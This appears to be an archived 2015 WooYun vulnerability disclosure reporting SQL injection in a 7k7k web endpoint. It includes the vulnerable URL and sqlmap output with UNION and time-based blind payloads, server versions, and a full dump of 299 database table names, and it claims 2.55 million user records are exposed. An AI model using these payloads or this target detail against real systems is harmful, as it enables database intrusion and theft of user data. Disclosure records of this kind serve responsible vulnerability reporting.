乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-05: 细节已通知厂商并且等待厂商处理中 2015-05-05: 厂商已经确认,细节仅向厂商公开 2015-05-15: 细节向核心白帽子及相关领域专家公开 2015-05-25: 细节向普通白帽子公开 2015-06-04: 细节向实习白帽子公开 2015-06-19: 细节向公众公开
http://web.7k7k.com/codes/get.php?pid=1
存在SQL注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: pid Type: UNION query Title: MySQL UNION query (NULL) - 15 columns Payload: pid=-5775 UNION ALL SELECT CONCAT(0x7175766771,0x4d51425a564641485579,0x7176776f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: pid=1 AND SLEEP(5)---web application technology: Apache, PHP 5.3.6back-end DBMS: MySQL 5.0.11Database: web7k[299 tables]+--------------------------+| admin_menu || admin_user || admin_user_role || baidu_keywordid || baidu_keywordid_days || baidu_sync_log || baidu_union || baidu_wm_days || gs_admin || gs_admin_group || gs_admin_menu || gs_charge || gs_charge_info || keyword || keywordid_week || kk_card_detail || kk_dealer || level_award || sogou_keywordid_days || sogou_sync_log || stat_adv_total || stat_money_log || stat_plan_category || testforid || uc_265g || uc_7k7kb || uc_7kblogs || uc_7kcharge || uc_addnum || uc_admin_logs || uc_adminlog || uc_adusers || uc_adv_category || uc_advert || uc_ahsgchoujiang || uc_ahsghd || uc_amtcount || uc_antecode || uc_antevote || uc_article || uc_asztchoujiang || uc_authogroup || uc_authority || uc_authormenu || uc_base || uc_binduser || uc_bulian || uc_buykk || uc_cardpay || uc_charge || uc_charge2011 || uc_charge_kkm || uc_chargeadduser || uc_chargefrom || uc_chargesale || uc_chengzi || uc_city || uc_class || uc_code || uc_codecate || uc_contactkf || uc_coop || uc_cps_account || uc_cps_confirm || uc_cps_rate || uc_cps_subuser || uc_cpskou || uc_cpslist || uc_cpssite || uc_cpsuser || uc_cqbyhd || uc_cqbynumber || uc_csbhchoujiang || uc_csbhhd || uc_csbhhdqd || uc_csbhma || uc_csbhrecord || uc_ddtchoujiang || uc_demouser || uc_dlqhd || uc_docochoujiang || uc_docohd || uc_downact || uc_downloads || uc_factions || uc_fcm || uc_fours || uc_fuchi || uc_gamecode || uc_gamecodeqxz || uc_gameindex || uc_games || uc_getaszt || uc_gethzw || uc_getuser || uc_gwactive || uc_hdlog || uc_hits || uc_hits_hours || uc_hzwchoujiang3 || uc_hzwhd01 || uc_hzwhd03 || uc_hzwquestion || uc_indexshow || uc_information || uc_integral_log || uc_jinjiang || uc_jjsgchoujiang || uc_jjsghd || uc_kanswer || uc_kdxyma || uc_kefu_question || uc_kefu_question_rookie || uc_kefu_rookie || uc_kefu_rookie_answer || uc_kefu_rookie_sh || uc_kefu_rookie_sh_answer || uc_kefu_vip || uc_kefu_vip_answer || uc_kkhuodong || uc_kkmao || uc_kquestion || uc_ktpd2choujiang || uc_ktpd2hd || uc_leftserverlist || uc_levelcharge || uc_levelset || uc_lhzschoujiang || uc_lhzschoujiang2 || uc_lhzshd || uc_lhzshd2 || uc_lhzsmtk || uc_loginlog || uc_makeReg || uc_makeWDReg || uc_mediabelong || uc_mediakeywords || uc_mediapic || uc_mgames || uc_mhit || uc_mthreads || uc_nc || uc_nslmchoujiang || uc_nslmhd || uc_other || uc_package || uc_package_code || uc_pageshow || uc_passlogs || uc_paypal || uc_paypalcharge || uc_pf || uc_pkddt || uc_pkddtuser || uc_pksupport || uc_playgame || uc_points || uc_points_record || uc_polling || uc_polls || uc_pwdappeal || uc_qq || uc_question || uc_qxzchoujiang || uc_qxzhd || uc_regFour || uc_sctxchoujiang || uc_sctxhd || uc_seoset || uc_servers || uc_settlement || uc_sign || uc_site || uc_sitepos || uc_sjsgchoujiang || uc_sjsghd || uc_smallpic || uc_sq_tuijiangame || uc_sqchoujiang || uc_sqhd || uc_sssghd || uc_subinfo || uc_sw || uc_swhours || uc_tg360 || uc_tgarticle || uc_tgbdnew || uc_tgcategory || uc_tgconfig || uc_tghao123 || uc_tghao123new || uc_tghao4 || uc_tghao5 || uc_tgmedia_image || uc_tgmedia_size || uc_tgmedia_type || uc_tgpage || uc_tgpage2 || uc_tgpage2345 || uc_tgpagehao123 || uc_tgpagehao123bak || uc_tgreg_page || uc_tgsgnew || uc_tgslides || uc_tgsynew || uc_tgxfnew || uc_threads || uc_tjaid || uc_tjaid2012 || uc_tjcount || uc_tjcpskou || uc_tjday || uc_tjdayold || uc_tjfrom || uc_tjgame || uc_tjhours || uc_tjmonthcount || uc_tjwdday || uc_tmpuser || uc_totalPay2011 || uc_totalPay2012 || uc_touchchoujiang || uc_touchfztp || uc_touchfztppl || uc_touchhd || uc_touchinfo || uc_touchpiao || uc_touchsign || uc_touchypcj || uc_touchypcj_tp || uc_union_day || uc_union_hours || uc_upload || uc_upload1 || uc_user0 || uc_user1 || uc_user10 || uc_user11 || uc_user12 || uc_user13 || uc_user14 || uc_user15 || uc_user16 || uc_user17 || uc_user18 || uc_user19 || uc_user2 || uc_user20 || uc_user21 || uc_user22 || uc_user23 || uc_user24 || uc_user25 || uc_user26 || uc_user27 || uc_user28 || uc_user29 || uc_user3 || uc_user30 || uc_user31 || uc_user32 || uc_user33 || uc_user34 || uc_user35 || uc_user36 || uc_user37 || uc_user38 || uc_user39 || uc_user4 || uc_user40 || uc_user41 || uc_user42 || uc_user43 || uc_user44 || uc_user45 || uc_user46 || uc_user47 || uc_user48 || uc_user49 || uc_user5 || uc_user6 || uc_user7 || uc_user8 || uc_user9 || uc_userlog || uc_vip || uc_vip_users || uc_vipuser || uc_wbcs || uc_webmaster || uc_wltemp || uc_wycqpwd || uc_xinshu || uc_xinshu_bzzr || uc_xinshu_cqby || uc_xinshu_login || uc_xinshu_mycs || uc_xinshu_rxtl || uc_zhixiao |+--------------------------+
255万用户数据
危害等级:高
漏洞Rank:20
确认时间:2015-05-05 16:10
感谢白帽子反馈。已通知相关技术人员处理。
暂无